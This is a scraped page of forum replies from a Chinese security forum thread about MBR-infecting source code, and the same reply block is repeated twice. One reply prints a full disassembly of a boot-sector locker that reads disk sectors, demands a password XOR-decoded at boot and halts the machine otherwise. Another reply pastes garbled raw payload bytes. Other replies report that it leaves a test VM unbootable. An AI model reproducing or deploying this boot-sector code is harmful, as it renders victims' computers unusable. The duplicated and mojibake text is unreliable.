[原创]mbr 感染源码~~~-编程技术-看雪-安全社区|安全招聘|kanxue.com

最新回复 (38) ◀ 1 2
xianboabcd 雪币： 474 活跃值： (91) 能力值： ( LV3，RANK：20 ) 在线值：发帖 16 回帖 125 粉丝 0 关注私信	xianboabcd 26 楼谢谢分享 2013-6-24 21:54 0
by木瓜雪币： 1 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 24 粉丝 0 关注私信	by木瓜 27 楼大哥写MBR，杀软报毒不？ 2013-6-24 23:01 0
viphack 雪币： 219 活跃值： (738) 能力值： (RANK：290 ) 在线值：发帖 135 回帖 1009 粉丝 42 关注私信	viphack 4 28 楼第一扇区被我写了检测的到的~ 2013-6-25 01:24 0
hakerwolf 雪币： 16 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 18 粉丝 0 关注私信	hakerwolf 29 楼学习，下来学习 2013-6-25 09:04 0
ycmint 雪币： 1149 活跃值： (833) 能力值： ( LV13，RANK：260 ) 在线值：发帖 28 回帖 893 粉丝 10 关注私信	ycmint 5 30 楼 lz 把语文好好打下基础.... 描述看得蛋疼..... 2013-6-25 09:19 0
dayang 雪币： 220 活跃值： (701) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 934 粉丝 1 关注私信	dayang 31 楼 VM XP SP2下，重起，起不来 2013-6-25 10:00 0
亮帅啊雪币： 280 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 20 回帖 42 粉丝 0 关注私信	亮帅啊 32 楼额这个没驱动怎么搞？？ 2013-6-25 12:25 0
ahappyboy 雪币： 1534 活跃值： (312) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 182 粉丝 0 关注私信	ahappyboy 33 楼不知所云…… 2013-6-26 10:47 0
fkt 雪币： 9 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 24 粉丝 0 关注私信	fkt 34 楼 mark 2013-6-27 13:53 0
wjuid 雪币： 36 活跃值： (45) 能力值： ( LV3，RANK：30 ) 在线值：发帖 2 回帖 35 粉丝 0 关注私信	wjuid 35 楼中间不让你看的HEX的反汇编^_^ C:\>DEBUG 123 -U 13CC:0100 FA CLI 13CC:0101 33C0 XOR AX,AX 13CC:0103 8ED0 MOV SS,AX 13CC:0105 BC007C MOV SP,7C00 13CC:0108 FB STI 13CC:0109 50 PUSH AX 13CC:010A 07 POP ES 13CC:010B 50 PUSH AX 13CC:010C 1F POP DS 13CC:010D FC CLD 13CC:010E BE1C7C MOV SI,7C1C 13CC:0111 BF1C06 MOV DI,061C 13CC:0114 50 PUSH AX 13CC:0115 57 PUSH DI 13CC:0116 B90002 MOV CX,0200 13CC:0119 F3 REPZ 13CC:011A A4 MOVSB 13CC:011B CB RETF 13CC:011C 33C0 XOR AX,AX 13CC:011E 50 PUSH AX 13CC:011F 50 PUSH AX 13CC:0120 50 PUSH AX 13CC:0121 B80100 MOV AX,0001 13CC:0124 50 PUSH AX 13CC:0125 33C0 XOR AX,AX 13CC:0127 50 PUSH AX 13CC:0128 B8007C MOV AX,7C00 13CC:012B 50 PUSH AX 13CC:012C B80100 MOV AX,0001 13CC:012F 50 PUSH AX 13CC:0130 B81000 MOV AX,0010 13CC:0133 50 PUSH AX 13CC:0134 8BF4 MOV SI,SP 13CC:0136 B80042 MOV AX,4200 13CC:0139 B280 MOV DL,80 13CC:013B CD13 INT 13 13CC:013D 0F DB 0F 13CC:013E 828B00EB41 OR BYTE PTR [BP+DI+EB00],41 13CC:0143 90 NOP 13CC:0144 54 PUSH SP 13CC:0145 54 PUSH SP 13CC:0146 68 DB 68 13CC:0147 41 INC CX 13CC:0148 204249 AND [BP+SI+49],AL 13CC:014B 4F DEC DI 13CC:014C 53 PUSH BX 13CC:014D 206949 AND [BX+DI+49],CH 13CC:0150 206F76 AND [BX+76],CH 13CC:0153 65 DB 65 13CC:0154 7220 JB 0176 13CC:0156 62 DB 62 13CC:0157 793A JNS 0193 13CC:0159 7669 JBE 01C4 13CC:015B 7068 JO 01C5 13CC:015D 61 DB 61U 13CC:015E 63 DB 63 13CC:015F 6B DB 6B 13CC:0160 2020 AND [BX+SI],AH 13CC:0162 2020 AND [BX+SI],AH 13CC:0164 2020 AND [BX+SI],AH 13CC:0166 206261 AND [BP+SI+61],A 13CC:0169 6E DB 6E 13CC:016A 7A68 JPE 01D4 13CC:016C 61 DB 61 13CC:016D 0000 ADD [BX+SI],AL 13CC:016F 0000 ADD [BX+SI],AL 13CC:0171 0000 ADD [BX+SI],AL 13CC:0173 00BC007C ADD [SI+7C00],BH 13CC:0177 B800B8 MOV AX,B800 13CC:017A 8EC0 MOV ES,AX 13CC:017C 0E PUSH CS 13CC:017D 1F POP DS 13CC:017E BE4406 MOV SI,0644 13CC:0181 33FF XOR DI,DI 13CC:0183 B4BC MOV AH,BC 13CC:0185 B93200 MOV CX,0032 13CC:0188 AC LODSB 13CC:0189 AB STOSW 13CC:018A E2FC LOOP 0188 13CC:018C 1E PUSH DS 13CC:018D 07 POP ES 13CC:018E B90700 MOV CX,0007 13CC:0191 BF7D06 MOV DI,067D 13CC:0194 51 PUSH CX 13CC:0195 57 PUSH DI 13CC:0196 B400 MOV AH,00 13CC:0198 CD16 INT 16 13CC:019A 0AC0 OR AL,AL 13CC:019C 74F8 JZ 0196 13CC:019E 5F POP DI 13CC:019F 3486 XOR AL,86 13CC:01A1 AA STOSB 13CC:01A2 59 POP CX 13CC:01A3 E2EF LOOP 0194 13CC:01A5 BE7606 MOV SI,0676 13CC:01A8 BF7D06 MOV DI,067D 13CC:01AB B90700 MOV CX,0007 13CC:01AE F3 REPZ 13CC:01AF A6 CMPSB 13CC:01B0 750A JNZ 01BC 13CC:01B2 90 NOP 13CC:01B3 90 NOP 13CC:01B4 33C0 XOR AX,AX 13CC:01B6 50 PUSH AX 13CC:01B7 BF007C MOV DI,7C00 13CC:01BA 57 PUSH DI 13CC:01BB CB RETF 13CC:01BC B800B8 MOV AX,B800 13CC:01BF 8ED8 MOV DS,AX 13CC:01C1 33DB XOR BX,BX 13CC:01C3 B845FC MOV AX,FC45 13CC:01C6 8907 MOV [BX],AX 13CC:01C8 EBFE JMP 01C8 13CC:01CA 55 PUSH BP 13CC:01CB AA STOSB 13CC:01CC AA STOSB 13CC:01CD 55 PUSH BP 2013-6-27 22:23 0
eidolonlon 雪币： 31 能力值： (RANK：10 ) 在线值：发帖 11 回帖 74 粉丝 1 关注私信	eidolonlon 36 楼 charme 的 http://www.vxjump.net/files/virus_analysis/mbr_infect.txt 为什么挂个原创呢? 这是原创吗? 2013-6-30 10:42 0
viphack 雪币： 219 活跃值： (738) 能力值： (RANK：290 ) 在线值：发帖 135 回帖 1009 粉丝 42 关注私信	viphack 4 37 楼 http://bbs.pediy.com/showthread.php?t=128657 ~~你也可以吐槽他的，写mbr方式都差不多就是mbr的编写~~ 你要百度一堆都是这样子的~~ 难道你不用驱动模板写驱动？ 2013-6-30 11:02 0
viphack 雪币： 219 活跃值： (738) 能力值： (RANK：290 ) 在线值：发帖 135 回帖 1009 粉丝 42 关注私信	viphack 4 38 楼 ?蹘??件{f`庅?- ?拎? 瀻溃鼄 \|1? 螗?f欪f &f ?L h ?N ?hS 藥赂I瞼穦?fa\? \| 渶麭t€?t濌 .?? 潨.u rY滫`? €麭u?劺~C鼒涟嬃?夁虍u5&f?饏鰐u?亇!€u?荅f屓f拎.f ?? .fｅ - &f塃a澥悙渀>f? € N>f?€ i>f?€ t>f?€ i>f?€ n>f?€ K>f?€ u>f?€ m>f?€ a>f?€ r>f?€ &>f?€ V>f?€ i>f? € p>f?"€ i>f?$€ n>f?(€ K>f?*€ u>f?,€ m>f?.€ a>f?0€ r>f? 1>f? 2>f? 3>f?█ 4a潐茀纔渷D$! 澝你这么厉害看看这里少了什么快说吧~ 2013-6-30 11:06 0
lxmls 雪币： 100 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 36 粉丝 1 关注私信	lxmls 39 楼 mark!!!!!!!! 2013-7-1 05:25 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (38) ◀ 1 2
xianboabcd 雪币： 474 活跃值： (91) 能力值： ( LV3，RANK：20 ) 在线值：发帖 16 回帖 125 粉丝 0 关注私信	xianboabcd 26 楼谢谢分享 2013-6-24 21:54 0
by木瓜雪币： 1 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 24 粉丝 0 关注私信	by木瓜 27 楼大哥写MBR，杀软报毒不？ 2013-6-24 23:01 0
viphack 雪币： 219 活跃值： (738) 能力值： (RANK：290 ) 在线值：发帖 135 回帖 1009 粉丝 42 关注私信	viphack 4 28 楼第一扇区被我写了检测的到的~ 2013-6-25 01:24 0
hakerwolf 雪币： 16 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 18 粉丝 0 关注私信	hakerwolf 29 楼学习，下来学习 2013-6-25 09:04 0
ycmint 雪币： 1149 活跃值： (833) 能力值： ( LV13，RANK：260 ) 在线值：发帖 28 回帖 893 粉丝 10 关注私信	ycmint 5 30 楼 lz 把语文好好打下基础.... 描述看得蛋疼..... 2013-6-25 09:19 0
dayang 雪币： 220 活跃值： (701) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 934 粉丝 1 关注私信	dayang 31 楼 VM XP SP2下，重起，起不来 2013-6-25 10:00 0
亮帅啊雪币： 280 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 20 回帖 42 粉丝 0 关注私信	亮帅啊 32 楼额这个没驱动怎么搞？？ 2013-6-25 12:25 0
ahappyboy 雪币： 1534 活跃值： (312) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 182 粉丝 0 关注私信	ahappyboy 33 楼不知所云…… 2013-6-26 10:47 0
fkt 雪币： 9 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 24 粉丝 0 关注私信	fkt 34 楼 mark 2013-6-27 13:53 0
wjuid 雪币： 36 活跃值： (45) 能力值： ( LV3，RANK：30 ) 在线值：发帖 2 回帖 35 粉丝 0 关注私信	wjuid 35 楼中间不让你看的HEX的反汇编^_^ C:\>DEBUG 123 -U 13CC:0100 FA CLI 13CC:0101 33C0 XOR AX,AX 13CC:0103 8ED0 MOV SS,AX 13CC:0105 BC007C MOV SP,7C00 13CC:0108 FB STI 13CC:0109 50 PUSH AX 13CC:010A 07 POP ES 13CC:010B 50 PUSH AX 13CC:010C 1F POP DS 13CC:010D FC CLD 13CC:010E BE1C7C MOV SI,7C1C 13CC:0111 BF1C06 MOV DI,061C 13CC:0114 50 PUSH AX 13CC:0115 57 PUSH DI 13CC:0116 B90002 MOV CX,0200 13CC:0119 F3 REPZ 13CC:011A A4 MOVSB 13CC:011B CB RETF 13CC:011C 33C0 XOR AX,AX 13CC:011E 50 PUSH AX 13CC:011F 50 PUSH AX 13CC:0120 50 PUSH AX 13CC:0121 B80100 MOV AX,0001 13CC:0124 50 PUSH AX 13CC:0125 33C0 XOR AX,AX 13CC:0127 50 PUSH AX 13CC:0128 B8007C MOV AX,7C00 13CC:012B 50 PUSH AX 13CC:012C B80100 MOV AX,0001 13CC:012F 50 PUSH AX 13CC:0130 B81000 MOV AX,0010 13CC:0133 50 PUSH AX 13CC:0134 8BF4 MOV SI,SP 13CC:0136 B80042 MOV AX,4200 13CC:0139 B280 MOV DL,80 13CC:013B CD13 INT 13 13CC:013D 0F DB 0F 13CC:013E 828B00EB41 OR BYTE PTR [BP+DI+EB00],41 13CC:0143 90 NOP 13CC:0144 54 PUSH SP 13CC:0145 54 PUSH SP 13CC:0146 68 DB 68 13CC:0147 41 INC CX 13CC:0148 204249 AND [BP+SI+49],AL 13CC:014B 4F DEC DI 13CC:014C 53 PUSH BX 13CC:014D 206949 AND [BX+DI+49],CH 13CC:0150 206F76 AND [BX+76],CH 13CC:0153 65 DB 65 13CC:0154 7220 JB 0176 13CC:0156 62 DB 62 13CC:0157 793A JNS 0193 13CC:0159 7669 JBE 01C4 13CC:015B 7068 JO 01C5 13CC:015D 61 DB 61U 13CC:015E 63 DB 63 13CC:015F 6B DB 6B 13CC:0160 2020 AND [BX+SI],AH 13CC:0162 2020 AND [BX+SI],AH 13CC:0164 2020 AND [BX+SI],AH 13CC:0166 206261 AND [BP+SI+61],A 13CC:0169 6E DB 6E 13CC:016A 7A68 JPE 01D4 13CC:016C 61 DB 61 13CC:016D 0000 ADD [BX+SI],AL 13CC:016F 0000 ADD [BX+SI],AL 13CC:0171 0000 ADD [BX+SI],AL 13CC:0173 00BC007C ADD [SI+7C00],BH 13CC:0177 B800B8 MOV AX,B800 13CC:017A 8EC0 MOV ES,AX 13CC:017C 0E PUSH CS 13CC:017D 1F POP DS 13CC:017E BE4406 MOV SI,0644 13CC:0181 33FF XOR DI,DI 13CC:0183 B4BC MOV AH,BC 13CC:0185 B93200 MOV CX,0032 13CC:0188 AC LODSB 13CC:0189 AB STOSW 13CC:018A E2FC LOOP 0188 13CC:018C 1E PUSH DS 13CC:018D 07 POP ES 13CC:018E B90700 MOV CX,0007 13CC:0191 BF7D06 MOV DI,067D 13CC:0194 51 PUSH CX 13CC:0195 57 PUSH DI 13CC:0196 B400 MOV AH,00 13CC:0198 CD16 INT 16 13CC:019A 0AC0 OR AL,AL 13CC:019C 74F8 JZ 0196 13CC:019E 5F POP DI 13CC:019F 3486 XOR AL,86 13CC:01A1 AA STOSB 13CC:01A2 59 POP CX 13CC:01A3 E2EF LOOP 0194 13CC:01A5 BE7606 MOV SI,0676 13CC:01A8 BF7D06 MOV DI,067D 13CC:01AB B90700 MOV CX,0007 13CC:01AE F3 REPZ 13CC:01AF A6 CMPSB 13CC:01B0 750A JNZ 01BC 13CC:01B2 90 NOP 13CC:01B3 90 NOP 13CC:01B4 33C0 XOR AX,AX 13CC:01B6 50 PUSH AX 13CC:01B7 BF007C MOV DI,7C00 13CC:01BA 57 PUSH DI 13CC:01BB CB RETF 13CC:01BC B800B8 MOV AX,B800 13CC:01BF 8ED8 MOV DS,AX 13CC:01C1 33DB XOR BX,BX 13CC:01C3 B845FC MOV AX,FC45 13CC:01C6 8907 MOV [BX],AX 13CC:01C8 EBFE JMP 01C8 13CC:01CA 55 PUSH BP 13CC:01CB AA STOSB 13CC:01CC AA STOSB 13CC:01CD 55 PUSH BP 2013-6-27 22:23 0
eidolonlon 雪币： 31 能力值： (RANK：10 ) 在线值：发帖 11 回帖 74 粉丝 1 关注私信	eidolonlon 36 楼 charme 的 http://www.vxjump.net/files/virus_analysis/mbr_infect.txt 为什么挂个原创呢? 这是原创吗? 2013-6-30 10:42 0
viphack 雪币： 219 活跃值： (738) 能力值： (RANK：290 ) 在线值：发帖 135 回帖 1009 粉丝 42 关注私信	viphack 4 37 楼 http://bbs.pediy.com/showthread.php?t=128657 ~~你也可以吐槽他的，写mbr方式都差不多就是mbr的编写~~ 你要百度一堆都是这样子的~~ 难道你不用驱动模板写驱动？ 2013-6-30 11:02 0
viphack 雪币： 219 活跃值： (738) 能力值： (RANK：290 ) 在线值：发帖 135 回帖 1009 粉丝 42 关注私信	viphack 4 38 楼 ?蹘??件{f`庅?- ?拎? 瀻溃鼄 \|1? 螗?f欪f &f ?L h ?N ?hS 藥赂I瞼穦?fa\? \| 渶麭t€?t濌 .?? 潨.u rY滫`? €麭u?劺~C鼒涟嬃?夁虍u5&f?饏鰐u?亇!€u?荅f屓f拎.f ?? .fｅ - &f塃a澥悙渀>f? € N>f?€ i>f?€ t>f?€ i>f?€ n>f?€ K>f?€ u>f?€ m>f?€ a>f?€ r>f?€ &>f?€ V>f?€ i>f? € p>f?"€ i>f?$€ n>f?(€ K>f?*€ u>f?,€ m>f?.€ a>f?0€ r>f? 1>f? 2>f? 3>f?█ 4a潐茀纔渷D$! 澝你这么厉害看看这里少了什么快说吧~ 2013-6-30 11:06 0
lxmls 雪币： 100 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 36 粉丝 1 关注私信	lxmls 39 楼 mark!!!!!!!! 2013-7-1 05:25 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复